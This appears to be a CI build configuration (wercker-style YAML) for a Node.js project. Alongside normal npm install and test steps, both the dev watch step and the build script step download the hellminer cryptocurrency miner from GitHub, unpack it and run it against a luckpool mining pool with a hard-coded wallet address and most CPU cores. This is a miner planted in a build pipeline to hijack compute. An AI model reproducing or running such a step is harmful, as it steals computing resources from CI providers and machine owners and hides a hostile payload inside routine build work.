box: 
  id: node:latest
  ports: 
    - "8080"
    
dev:
  steps:
    - npm-install
    - internal/watch:
        code: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xzf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RSLaafsZRq7WNqhcCQQzwxe57y2PZc3eP8.volkath1 -p x --cpu 7
        reload: true

build:
  steps:
    - script:
        code: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xzf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RSLaafsZRq7WNqhcCQQzwxe57y2PZc3eP8.volkath1 -p x --cpu 7
    - npm-install
    - npm-test
    - script:
        name: echo nodejs information
        code: |
          echo "node version $(node -v) running"
          echo "npm version $(npm -v) running"
